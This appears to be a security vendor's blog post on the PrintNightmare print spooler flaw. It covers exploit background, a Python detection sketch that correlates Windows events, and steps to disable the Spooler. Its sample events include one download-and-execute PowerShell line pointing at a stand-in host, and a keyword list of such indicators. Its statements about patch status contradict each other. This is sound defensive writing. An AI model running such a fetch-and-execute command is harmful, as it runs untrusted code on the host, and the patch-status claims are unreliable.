Exploit Background
At the start of this month, a proof of concept for a Microsoft print spooler vulnerability rocked Windows admins, causing a clamor to contain the worst of the damage. This vulnerability is covered under CVE-2021-34527.

Originally marked as a ‘low severity’ vulnerability, it gained attention when a proof of concept showed how easily this patched vulnerability could be exploited for privilege escalation. To exploit it, an attacker need only find a system with:

  • An enabled Print Spooler service
  • Network connectivity
  • A password for another user/account on the system, including system accounts

Notably, this vulnerability can enable lateral movement and the acquisition of elevated privileges within the network. While this is concerning, its use means that the attacker is already inside the network and at a later phase of the kill chain.

Also of note: if the affected machines are patched, this vulnerability is limited to local privilege escalation. If they are not patched, the original remote code execution vulnerability is also still of concern.

There are now many proof-of-concept exploits in various languages. One such release is from user ‘afwu’ on GitHub, available at github.com/afwu/PrintNightmare.

This vulnerability was raised to critical severity on July 6th for several reasons:

  • Networked attack - a much faster and more convenient vector than physical access
  • Low privileges required - even a guest account or a system account (and therefore an application) can take advantage
  • No user interaction necessary
  • No patch available

That said, the impact of a privilege escalation of this sort could be very severe, allowing covert access to private data without raising an alarm. Spread far enough, a privilege escalation of this type can allow an attacker to push malicious software en masse to all networked machines, or to gain administrator controls and further their foothold in the network.

Automation Logic
Privilege escalation typically serves a few larger purposes for the attacker. In this case, an attacker may do one or more of the following:

  • Install/deploy additional accounts
  • Schedule cron jobs
  • Dump password hashes
  • Enable new services
  • Download and run new executables
  • Run malicious PowerShell scripts

Thankfully, existing LogicHub MDR detections already search for events of the above types, meaning that active exploitation of this vulnerability is already under direct monitoring and reporting. No additional infrastructure is required to ensure monitoring coverage against this CVE for MDR customers. (LogicHub SOAR customers who wish to implement these detections in their own environments should contact their customer service manager).
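As an added example (not LogicHub's detection content), the following Python sketches the “what, not how” approach described above: it classifies Windows event records into the action-on-objective categories listed and flags hosts where several categories appear together, rather than looking for one CVE. The event IDs are real Windows IDs; the category mapping, keyword lists, host names and sample events are assumptions constructed for this example.

```python
import json
from collections import defaultdict

# Windows event IDs mapped to the categories of post-exploitation activity listed above.
# The IDs are real; grouping them into these categories is this example's assumption.
CATEGORIES = {
    4720: "account_created",         # Security log: a user account was created
    4698: "scheduled_task_created",  # Security log: a scheduled task was created
    7045: "service_installed",       # System log: a new service was installed
    4104: "powershell_scriptblock",  # PowerShell log: script block text logged
    4688: "process_created",         # Security log: a new process was created
}
# Substrings that commonly indicate download-and-execute PowerShell (assumed list).
SUSPICIOUS_PS = ("downloadstring", "invoke-expression", "iex ", "frombase64string")
# Executables launched from user-writable paths are treated as "download and run" (assumption).
WRITABLE_DIRS = ("\\temp\\", "\\appdata\\", "\\users\\public\\")

def classify(event):
    """Return the activity category for one event dict, or None if it is not of interest."""
    cat = CATEGORIES.get(event.get("EventID"))
    if cat == "powershell_scriptblock":
        text = event.get("ScriptBlockText", "").lower()
        return cat if any(s in text for s in SUSPICIOUS_PS) else None
    if cat == "process_created":
        path = event.get("NewProcessName", "").lower()
        return cat if any(d in path for d in WRITABLE_DIRS) else None
    return cat

def correlate(events, min_categories=2):
    """Group matching events by host and flag hosts showing several distinct categories."""
    by_host = defaultdict(set)
    for ev in events:
        cat = classify(ev)
        if cat:
            by_host[ev["Computer"]].add(cat)
    return {h: sorted(c) for h, c in by_host.items() if len(c) >= min_categories}

# Constructed sample events (JSON lines), not real telemetry.
SAMPLE_LOG = """\
{"Computer": "WS01", "EventID": 4720, "TargetUserName": "svc_helper"}
{"Computer": "WS01", "EventID": 4698, "TaskName": "\\\\Updater"}
{"Computer": "WS01", "EventID": 7045, "ServiceName": "SpoolHelper"}
{"Computer": "WS01", "EventID": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"}
{"Computer": "WS02", "EventID": 4104, "ScriptBlockText": "Get-Process | Sort-Object CPU"}
{"Computer": "WS02", "EventID": 4688, "NewProcessName": "C:\\\\Windows\\\\System32\\\\notepad.exe"}
{"Computer": "WS03", "EventID": 4688, "NewProcessName": "C:\\\\Users\\\\Public\\\\update.exe"}
"""

def parse(jsonl):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]
```

Running `correlate(parse(SAMPLE_LOG))` flags only WS01, where four distinct categories line up; WS03 shows a single suspicious process launch and is surfaced only if the threshold is lowered to one category.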

According to LogicHub Threat Detection Lead Anthony Morris, this may be one of the best ways to detect exploitation of vulnerabilities of this type.

“The focus of my detection content is not to detect any of the 5,152 things that emerged in the last 3 months, of which this is just two of them... the focus of the detection content is to identify malicious actors acting on objectives.”

Considering the high number of CVEs added to monitoring daily, it makes sense to focus on the ‘what’ (the events that occur) rather than the ‘how’ (specific CVEs and methodology). While knowing popular methods is important, a mountain of separate per-CVE detections, especially for this sort of vulnerability, may only complicate how active events are found. In the end, the largest concern of any monitoring team is the result of the actions on the objective.

PrintNightmare targets machines with an enabled Print Spooler service, so office environments and those who rely on printers most (or even the Print to PDF feature) should take extra care, as they cannot disable the service. These machines should be carefully monitored and their network connections limited. Where the service can be disabled, the following methods do so via PowerShell on a single machine or via GPO:

PowerShell (run from an elevated prompt):
  Stop-Service -Name Spooler -Force
  Set-Service -Name Spooler -StartupType Disabled

GPO: adjust the service under “Policies/Windows Settings/Security Settings/System Services/Print Spooler”

All administrators should also ensure that Print Spooler is completely turned off for those who do not need it, and that all roles and users follow the ‘least privilege’ access model. Where no other restriction is possible, limit the access control list on the ‘System32/spool/drivers’ directory.

The PrintNightmare vulnerability has no known full remediation and is of foremost concern due to active exploitation in the wild.

Recommended Sources
Afwu. “Afwu/PrintNightmare.” GitHub, 2021, github.com/afwu/PrintNightmare.

Hammond, John. “Critical Vulnerability: PrintNightmare Exposes Windows Servers to Remote Code Execution.” Huntress, 2021, www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution.

Naraine, Ryan. “Windows Admins Scrambling to Contain 'PrintNightmare' Flaw Exposure.” SecurityWeek, 2021, www.securityweek.com/windows-admins-scrambling-contain-printnightmare-flaw-exposure.

Sandbu, Marius. “PrintNightmare – CVE-2021-1675.” Marius Sandbu (Personal Portfolio), 6 July 2021, msandbu.org/printnightmare-cve-2021-1675/.

“Security Update Guide - CVE-2021-34527.” Microsoft Security Response Center, 2021, msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527.
